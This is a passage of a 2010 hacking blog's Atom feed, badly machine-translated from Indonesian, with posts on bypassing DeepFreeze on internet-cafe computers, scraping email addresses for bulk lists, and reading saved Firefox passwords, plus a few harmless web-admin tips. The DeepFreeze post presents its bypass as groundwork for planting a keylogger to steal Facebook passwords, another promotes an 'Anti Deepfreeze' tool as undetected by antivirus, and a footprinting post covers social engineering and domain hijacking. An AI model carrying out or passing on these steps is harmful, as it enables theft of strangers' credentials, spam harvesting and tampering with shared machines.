src="http://adsensecamp.com/show/?id=z6qY0GVZWNk%3D&amp;cid=sO23aMPfjUo%3D&amp;chan=8hcdU8pj4A0%3D&amp;type=5&amp;title=006699&amp;text=000000&amp;background=FFFFFF&amp;border=FFFFFF&amp;url=006699" type="text/javascript"&gt;&lt;/script&gt; &lt;!-- End: http://adsensecamp.com/ --&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Previously I had a post about how to hack facebook poker chips keylogger method. Will be a problem for my friends if it finds a computer that is installed deepfreeze v 6 and above. If deepfreeze v5 broken down was easy, right?&lt;br /&gt;DeepFreeze is compatible in pairs in the cafe so that the virus is not stored and lost during the restart. This also becomes a problem when installing any program installed diwarnet deepfreeze. Keylogger is no exception. Because the program will not be saved when the computer is restarted.&lt;br /&gt;Luckily we have friends who want to share experiences Ucoon.co.cc "DeepFreeze hacker cafe" in its web. Copas well here's how I let my friends, agan-agan, kk2, ad2, all assigned to this information. Do not think aya taught hack loh. I just give us the info, dipake least this way depends indivdunya, Bener not? The following excerpts:&lt;br /&gt;Prepare the first of at least 1 GB Flash Disk, used as the initial boot media when the company switched.&lt;br /&gt;Making a Linux live USB.&lt;br /&gt;Install DeepFreeze V.6 on another computer, then set DeepFreezenya be thawed Boot and restart the computer.&lt;br /&gt;Copy the file $ persi0.sys located in C: \ to the Flash Disk that has been created for the Linux live USB.&lt;br /&gt;Naah .. Skr we can begin to act only with Flash Disk 1 GB ... &lt;span class="fullpost"&gt; &lt;br /&gt;Remember do not do that damage the interests of people hal2!.&lt;br /&gt;Turn on the target computer and do not forget to set the first boot from a USB biosnya n wait until it finishes loading the Linux live Usbnya (yesterday I was wearing backtrak 3 if you do not have a download only).&lt;br /&gt;After that, search the storage media file system Linux Windows with Windows Explorer and locate the file $ persi0.sys, if was able to delete or move the location of the file.&lt;br /&gt;Copy the file $ persi0.sys that has been copied to the Flash Disk into location $ persi0.sys previously (klo diwindows "C: \ $ persi0.sys").&lt;br /&gt;Now restart the computer and re-prioritized normalkan bootnya from a disk.&lt;br /&gt;Now prepare DeepFreeze V.6 and double-click, then the window will pop up and do the uninstall deepfreeze uninstall process until selesei.&lt;br /&gt;DeepFreeze Shit ...&lt;br /&gt;   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-3847625390666370387?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/3847625390666370387/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/deepfreeze-v-6xx-how-to-collapse-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3847625390666370387'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3847625390666370387'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/deepfreeze-v-6xx-how-to-collapse-in.html' title='Deepfreeze v 6.xx How to collapse in a computer cafe (preparation hack facebook password)'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2177544340119633980</id><published>2010-05-18T04:05:00.000-07:00</published><updated>2010-05-18T04:08:36.653-07:00</updated><title type='text'>How To Get Tens of Thousands Email</title><content type='html'>&lt;!-- Begin: http://adsensecamp.com/ --&gt;&lt;br /&gt;&lt;script src="http://adsensecamp.com/show/?id=z6qY0GVZWNk%3D&amp;cid=sO23aMPfjUo%3D&amp;chan=8hcdU8pj4A0%3D&amp;type=5&amp;title=006699&amp;text=000000&amp;background=FFFFFF&amp;border=FFFFFF&amp;url=006699" type="text/javascript"&gt;&lt;/script&gt;&lt;br /&gt;&lt;!-- End: http://adsensecamp.com/ --&gt;&lt;br /&gt;A. Use the software Mailcrawl (notworksolution.com) Version 3000 free version can store all the email search, grub should be able to save up to 15 000 emails / keyword.&lt;br /&gt;&lt;br /&gt;How to use:&lt;br /&gt;1. In the quick start wizard click the target using keyword searching and then enter a unique Indonesia&lt;br /&gt;(Family, money, women, success, agriculture, military)&lt;br /&gt;2. Option:&lt;br /&gt;a. select 60-80 thread&lt;br /&gt;b. parsing email: click only extract emails with These extensions / domain and content. com. net. en c. These email with the username ignore the contents of the list of words below: (copy only)&lt;br /&gt;abuse info privacy notice Consult sales support nospam spam bugtraq Listserv subscribe unsubscribe&lt;br /&gt;reply majordomo daemon bounce mail domain name news www xxx 20 3d files play webadmin webmaster&lt;br /&gt;admin postmaster hostmaster owner promaster manajerhosting tuanweb webhosting billing register list&lt;br /&gt;cs feedback comments customercare customerservice manager username yourname name Yourname&lt;br /&gt;cs prohosting technical support service technical support request info zzz joint stop&lt;br /&gt;&lt;!-- Begin: http://adsensecamp.com/ --&gt;&lt;br /&gt;&lt;script src="http://adsensecamp.com/show/?id=z6qY0GVZWNk%3D&amp;cid=sO23aMPfjUo%3D&amp;chan=8hcdU8pj4A0%3D&amp;type=5&amp;title=006699&amp;text=000000&amp;background=FFFFFF&amp;border=FFFFFF&amp;url=006699" type="text/javascript"&gt;&lt;/script&gt;&lt;br /&gt;&lt;!-- End: http://adsensecamp.com/ --&gt;&lt;br /&gt;members of the index menu help file article d. automatic saving select number 1000 e. Start --- name the folder where to store the results in accordance with a keyword f. If the number of valid e-mail has not reached 1.000, while the search panel have a deadline approaching,&lt;br /&gt;do stop then add new keywords without having to reset again. We suggest the folder name&lt;br /&gt;keywords combined storage&lt;br /&gt;g. If the number of invalid email has approached the 3000 figures while the search panel is still far from the boundary&lt;br /&gt;end. Do stop and then start then give the new folder name search results, you should KEYWORD1,&lt;br /&gt;KEYWORD2 ff.&lt;br /&gt;&lt;br /&gt;3. If you already have been collected by many keywords, there must be a multiple emails.&lt;br /&gt;To obtain single-use email list software Listawy (mewsoft.com). This software can in addition&lt;br /&gt;merge, email removal also mensplit all emails according to the number of files or the number of emails / per file&lt;span class="fullpost"&gt;   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2177544340119633980?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2177544340119633980/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/how-to-get-tens-of-thousands-email.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2177544340119633980'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2177544340119633980'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/how-to-get-tens-of-thousands-email.html' title='How To Get Tens of Thousands Email'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-154842224120847845</id><published>2010-05-18T03:40:00.000-07:00</published><updated>2010-05-18T03:40:23.743-07:00</updated><title type='text'>Knowing Tips email accounts and passwords stored in Firefox browser</title><content type='html'>hallo guys...&lt;br /&gt;&lt;br /&gt;This time edji want to discuss tips to know others username and password stored in Firefox browser. Why should firefox? because firefox is a browser's most popular and most used. This mode is very useful if the target we have a company or personal laptop because in general the kit store (Remember) the password in the browser for reasons of convenience.&lt;br /&gt;&lt;br /&gt;* At the victim's computer, open mozilla&lt;br /&gt;* Select the Tools menu&amp;gt; Options&lt;br /&gt;* In the Options window click &lt;span class="fullpost"&gt;the Security tab&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_Dctv9GCvTgs/S_JtnkkVaNI/AAAAAAAAAZs/corRMeX0Oy4/s1600/20-03-2010+13-16-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/S_JtnkkVaNI/AAAAAAAAAZs/corRMeX0Oy4/s320/20-03-2010+13-16-33.png" /&gt;&lt;/a&gt;&lt;/div&gt;# Click the Saved Password&lt;br /&gt;# If the victim never save (remember) password and username in firefox it will show here.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S_JuDr9gvrI/AAAAAAAAAZ0/j_QtuIE_2FE/s1600/w.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S_JuDr9gvrI/AAAAAAAAAZ0/j_QtuIE_2FE/s320/w.png" /&gt;&lt;/a&gt;&lt;/div&gt;Click the Show Password to see the password.&lt;br /&gt;Okay, you already know the username and password for your friend. Not only facebook is not it? You can even find all the usernames and passwords are never stored in the firefox browser, such as email accounts and so forth.&lt;br /&gt;Once again, science is just for a newbie like edji gan this. Sorry my friends that I've stolen his password. Sorry yah. Create temen-temen me, next time yah pake master password.&lt;br /&gt;&lt;br /&gt;Create-agan agan a senior already, yah ... please shared their knowledge do not just protest blogs of others. Emang Well this blog is far from complete, but edji always try to give my best. Dimnfaatkan with both his knowledge well. Do not be using that to steal passwords loe own best friend. Never sob ..   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-154842224120847845?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/154842224120847845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/knowing-tips-email-accounts-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/154842224120847845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/154842224120847845'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/knowing-tips-email-accounts-and.html' title='Knowing Tips email accounts and passwords stored in Firefox browser'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Dctv9GCvTgs/S_JtnkkVaNI/AAAAAAAAAZs/corRMeX0Oy4/s72-c/20-03-2010+13-16-33.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2708648682770438530</id><published>2010-05-18T03:33:00.000-07:00</published><updated>2010-05-18T03:33:59.581-07:00</updated><title type='text'>Password breaker software v6 100% working Deepfreeze</title><content type='html'>Afternoon poker mania ... Previously ay ever post about how to hack deepfreeze v6 in a computer cafe. That way I think is still too complicated to try. Well, for those not bothered now already have the software create deepfreeze hacker v6. His name is Anti Deepfreeze. Actually edji have long wanted this post, but because of busy college so delayed ...&lt;br /&gt;This software can collapse deepfreeze v4 standard, the standard v5, v6 and v6 standard evaluation. One of the advantages of this software other than software that is not detected by antivirus trojan therefore safe to &lt;span class="fullpost"&gt;use in action&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="fullpost"&gt;&lt;a href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S_Jsv3PbC2I/AAAAAAAAAZc/kUt0lnRpy78/s1600/anti+deepfreeze+v6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S_Jsv3PbC2I/AAAAAAAAAZc/kUt0lnRpy78/s320/anti+deepfreeze+v6.png" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;Fairly easy way of remaining life.&lt;br /&gt;&lt;br /&gt;* Press the Shift key while jamming click the icon deepfreeze.&lt;br /&gt;* It would appear that installed deepfreeze version&lt;br /&gt;*In this case I find a deep freeze v6 Standard Evaluation.&lt;br /&gt;* Run anti deepfreezenya select the software version deepfreezenya, then click Apply.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S_Js_4d7AWI/AAAAAAAAAZk/wR7fWMTgqSA/s1600/Picture1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S_Js_4d7AWI/AAAAAAAAAZk/wR7fWMTgqSA/s320/Picture1.png" /&gt;&lt;/a&gt;&lt;/div&gt;* After that, you just change the password ... OK deh ....&lt;br /&gt;&lt;br /&gt;Create a edji not like to blog ... please forgive ... edji just trying to help in any way aku.edji not tell you that I was the master and all posts edji quality ... sorry   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2708648682770438530?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2708648682770438530/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/password-breaker-software-v6-100.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2708648682770438530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2708648682770438530'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/password-breaker-software-v6-100.html' title='&lt;h1&gt;Password breaker software v6 100% working Deepfreeze&lt;/h1&gt;'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Dctv9GCvTgs/S_Jsv3PbC2I/AAAAAAAAAZc/kUt0lnRpy78/s72-c/anti+deepfreeze+v6.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5229822847605967697</id><published>2010-05-12T04:36:00.000-07:00</published><updated>2010-05-12T04:36:11.715-07:00</updated><title type='text'>Looking at the Computer Serial Number?</title><content type='html'>To see the serial number and serial number on a computer search can be done quickly using the tools named Keyfinder. &lt;br /&gt;These tools can be downloaded for free at the site creators in www.magicaljellybean.com / keyfinder. Keyfinder can be used in OS Windows 95, 98, ME, 2000, XP, danWin7. &lt;br /&gt;This program is free, the total has reached 7,095,439 unduhannya last author visited on 05/06/2010. &lt;br /&gt;The features of this Keyfinder as follows: &lt;br /&gt;Features: &lt;br /&gt;Open Source - This Means That Can it be trusted. The Keyfinder does not contain trojans or "phone home" messages. No spam, spyware, viruses, trojans or. &lt;br /&gt;An optional config file - this functionality lets you pull a key stored in the registry for any software &lt;br /&gt;Command line options - / save &lt;location&gt; / savecsv &lt;location&gt; / close / hive &lt;location&gt; / file &lt;filename&gt; &lt;br /&gt;Load Hive option - allows you to load the registry hive of &lt;span class="fullpost"&gt;  another Windows installation. To use, put the hard drive in a working machine (Also must be Windows 2000, XP or Vista) or use Windows PE (not tested, Should work) and click Load Hive. Then point it to the dead Windows install. If you're using Windows Vista, Administrator rights are required for this feature. May you have to Right click on the Keyfinder and run as Administrator. &lt;br /&gt;Improved Save &amp; Print! - Save &amp; print options will from now include all keys. Save Is Also available in text or CSV. &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5229822847605967697?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5229822847605967697/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/looking-at-computer-serial-number.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5229822847605967697'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5229822847605967697'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/looking-at-computer-serial-number.html' title='&lt;h2&gt;Looking at the Computer Serial Number?&lt;/h2&gt;'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5565344662699840338</id><published>2010-05-12T04:29:00.000-07:00</published><updated>2010-05-12T04:29:50.273-07:00</updated><title type='text'>Passive Footprinting</title><content type='html'>&lt;h3&gt;Passive footprinting is the initial information gathering process does not involve the victim but the victim directly. What are the benefits that can hackers get through passive footprinting?&lt;br /&gt;In Passive footprinting hackers can obtain information about the victims, namely:&lt;/h3&gt;1. To find out company information&lt;br /&gt;2. IP address of the company&lt;br /&gt;3. Domain name registration company information&lt;br /&gt;&lt;br /&gt;And of the three points above there was more beneficial than passive footprinting some powerful weapons to find and reveal the identity of a hacker, but we will not be discussed here but in the next article we will discuss.&lt;br /&gt;And the three points above we'll discuss it one on one. This tutorial is to add insight only if there are errors in the content of this post. Please in the correction&lt;br /&gt;&lt;span class="fullpost"&gt;  1. To find information peruhaan&lt;br /&gt;In this section, hackers will find information relating to companies ranging from corporate web site addresses, employee information, contact email and phone contact firm, host location and ISP used, and data relating to other companies.&lt;br /&gt;How do hackers get all that information?&lt;br /&gt;1.1. For website addresses&lt;br /&gt;Hackers can use google to search for the company's name and usually the company is using the meta description and meta keywords on the company and its services or the services provided and this is not a difficult thing to do.&lt;br /&gt;1.2. Employee Information&lt;br /&gt;Some companies generally to facilitate the client in terms of support services display a list of names of staff and the type of work. In this section hackers collect personal data of employees to perform social engineering action.&lt;br /&gt;.3. Contact E-mail and telephone&lt;br /&gt;To contact e-mail and telephone from the company can be found on the page or contact us about us on the web page of the company.&lt;br /&gt;1.4. Host location and ISP used&lt;br /&gt;Why is this necessary? This is in needing to find information on the network range used, the ports are open and to know the travel route data packets to the victim's computer clicks. read here for more details&lt;br /&gt;2. IP address of the company&lt;br /&gt;What are the benefits of knowing the IP address of the company? There are so many things that can be known from the IP address from a server location, the ISP used, and information control of the company.&lt;br /&gt;2.1. Location server&lt;br /&gt;To find the location of the server we only need an IP Address alone. How? Open this address in your browser and enter the IP address or Hostnya Address.&lt;br /&gt;2.2 Internet Service Provider used&lt;br /&gt;To find an ISP that used on the site you can menceknya www.wxtips.com / tools / info on the IP data will be visible from neighboring Networking server.&lt;br /&gt;Domain Name Information Server 2.3&lt;br /&gt;Control can be obtained when we had a whois domain name, can use centralops.net, wxtips.com or domain if Indonesia could use pandu.or.id.&lt;br /&gt;3. Domain Name Information&lt;br /&gt;Some companies use a domain protect the Domain Name to protect his company. Why? Clearly, to protect against domain theft or hijacking of the domain. How? Hackers will see the domains that will expire domainsbot.com active period can pass, or other whois sites and if you forgot to extend the domain owner domain, the domain will be changing hands. Beside that, the hacker can also masquerade as a company where you bought the domain and ask my neighbor data domain name such as EEP code and others. Then how do I protect working domain? &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5565344662699840338?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5565344662699840338/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/passive-footprinting.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5565344662699840338'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5565344662699840338'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/passive-footprinting.html' title='&lt;h2&gt;Passive Footprinting&lt;/h2&gt;'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2958803164605801435</id><published>2010-05-07T09:26:00.000-07:00</published><updated>2010-05-07T09:26:46.702-07:00</updated><title type='text'>Wordpress Hack – How to Get Simple Tags Plugin Working with Wordpress 2.9!</title><content type='html'>For those of you who are getting errors with Simple Tags plugin when upgrading to Wordpress 2.9, there’s a simple hack to make it work:&lt;br /&gt;&lt;br /&gt;Edit the file simple-tags.php and change the following from this:&lt;br /&gt;&lt;br /&gt;if ( strpos($wp_version, ‘2.7′) !== false || strpos($wp_version, ‘2.8′) !== false )&lt;br /&gt;&lt;br /&gt;to this:&lt;br /&gt;&lt;br /&gt;if ( strpos($wp_version, ‘2.7′) !== false || strpos($wp_version, ‘2.8′) !== false || strpos($wp_version, ‘2.9′) !== false )&lt;br /&gt;&lt;br /&gt;I guess it’s because the version numbers were hard-coded, not because the plug-in isn’t compatible with 2.9.&lt;br /&gt;&lt;br /&gt; &lt;span class="fullpost"&gt;   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2958803164605801435?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2958803164605801435/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/wordpress-hack-how-to-get-simple-tags.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2958803164605801435'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2958803164605801435'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/wordpress-hack-how-to-get-simple-tags.html' title='Wordpress Hack – How to Get Simple Tags Plugin Working with Wordpress 2.9!'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5977596032912115440</id><published>2010-05-07T09:03:00.001-07:00</published><updated>2010-05-07T09:03:27.674-07:00</updated><title type='text'>How to Ping Your Website Worldwide!</title><content type='html'>Just Ping is a service that will ping your website from various different locations in the world. If you want to optimize your site and also wonder how fast it would load in other parts of the world, you can use Just Ping to do just that.&lt;br /&gt;&lt;br /&gt;Another great feature is that you can also check the IP address being reported by various different points in the world. What this does is helps you check DNS delegation status of your website during a DNS move.&lt;br /&gt;&lt;span class="fullpost"&gt;   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5977596032912115440?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5977596032912115440/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/how-to-ping-your-website-worldwide.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5977596032912115440'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5977596032912115440'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/how-to-ping-your-website-worldwide.html' title='How to Ping Your Website Worldwide!'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-6433501570696775474</id><published>2010-05-07T08:56:00.000-07:00</published><updated>2010-05-07T09:10:59.018-07:00</updated><title type='text'>Check Your Website For DNS Delegation!</title><content type='html'>When you change your DNS records, your DNS delegation will usually take more than 12-24 hours on average.  This means that during that time, it might be impossible to check your website.&lt;br /&gt;This can be a big problem if you are moving a website to a new server and you can’t check if you’ve moved everything right.&lt;br /&gt;So, how do you check your website on the new server during DNS delegation?&lt;br /&gt;You can easily do this by changing the DNS servers on your &lt;b&gt;computer.&lt;/b&gt;&lt;br /&gt;For Windows, you can go into your network adaptor settings, then  right-click on your &lt;span class="fullpost"&gt;adaptor, then select “Properties”.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S-Q3rPlEsvI/AAAAAAAAAY8/kVcSj_nPSRc/s1600/dns-howto-1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S-Q3rPlEsvI/AAAAAAAAAY8/kVcSj_nPSRc/s320/dns-howto-1.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;You will see a bunch of options like the above screen shot.  Simply double-click on “Internet Protocol Version 4 (TCP/IPv4).  This screenshot was from Windows 7 and on other Windows, I think it’s simply called “TCP/IP”.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_Dctv9GCvTgs/S-Q4I2yOFSI/AAAAAAAAAZE/cXRJF07e0I8/s1600/dns-howto-2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/S-Q4I2yOFSI/AAAAAAAAAZE/cXRJF07e0I8/s320/dns-howto-2.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;Here, you can set your DNS server to your new web server’s IP address.  In this example, I set it to “47.23.55.24″.&lt;br /&gt;&lt;br /&gt;Click okay and try navigating to your URL such as mydomain.com.  Now you should be able to see your website on your browser and make sure your website has been moved successfully before DNS delegation is finished.&lt;br /&gt;&lt;br /&gt;Also, any images not from your own domain name (URL) will not load on your browser.   This is because you can only load elements from your domain name as your DNS is set to your new web server.&lt;br /&gt;&lt;br /&gt;Now, this might not work if you are on shared server or it could, it depends on your hosting provider.  For dedicated servers, VPS, or hosting servers with your own unique IP address, it should work flawlessly.&lt;br /&gt;&lt;br /&gt;Make sure you go through the above process and set your DNS back to “Obtain DNS server address automatically” when you are done testing your new server.&lt;br /&gt;&lt;br /&gt;That is one of the ways of doin’ it but there’s also a better way if you want to be able to access the whole internet.&lt;br /&gt;&lt;br /&gt;You can edit the hosts file under C:\windows\system32\drivers\etc\hosts.  Simply edit the file with a notepad program and add the following line at the end of the file:&lt;br /&gt;&lt;br /&gt;47.23.55.24 mydomain.com&lt;br /&gt;&lt;br /&gt;where 47.23.55.24 is the IP of your new server and mydomain.com is the domain name of your website.&lt;br /&gt;&lt;br /&gt;Now save the file and try loading your site on the browser, it will load from your new server.&lt;br /&gt;&lt;br /&gt;One more thing, you can also check the IP address of your website (to make sure it’s coming from the new server) by going to command prompt (type cmd under Start-&gt;Search programs and files) then typing ping mydomain.com.&lt;br /&gt;&lt;br /&gt;By being able to check that everything is working correctly on your new server, you will lose ZERO traffic during DNS delegation because your website will load flawlessly whether on the old server or the new server.&lt;br /&gt;&lt;br /&gt;How cool is that?&lt;br /&gt;&lt;br /&gt;Well, for those of you who didn’t know, now you know!  Make sure to subscribe for more great free tips on hacking your web server!&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-6433501570696775474?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/6433501570696775474/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/05/check-your-website-for-dns-delegation.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/6433501570696775474'/><link rel='self' type='application/atom+xml' 